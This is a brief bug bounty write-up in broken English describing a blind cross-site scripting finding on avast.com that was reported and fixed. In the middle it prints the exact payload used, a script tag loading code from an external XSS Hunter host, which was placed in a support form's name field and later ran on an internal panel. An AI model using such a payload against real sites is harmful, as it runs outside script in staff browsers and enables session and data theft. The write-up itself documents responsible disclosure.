My firts Writeup Blind xss
Hay evrybody i hope you all good,its my firts time i write my story on bugbounty,it started when i come to avast.com i search some vulnerability there but not luck i cant found anything there and after several hours of serching i found some place where we can make some help request to the panel service.
the page look like this
its my favorite place where i can try to found some blind xss. then i open my xss hunter and insert some xss hunter payload ‘“><script src=https://dimasaprilian993.xss.ht></script’ > on the your firts name.
after that i just submited my request and hope my payload execute on the panel service . okey here i just waything and after one day i got notification from xss hunter to my email if my payload was execute on http://ccs.int.avast.com:8181/sf_case.php?
oh ya this my lucky , after its i just reported my finding to the security i send them email with description of my finding.
TIME LINE
27 maret i send email to secuirty
6 april they work fixing the bug
29 april bug fixing,they give me certivicate and i request to disclosure.
thanks.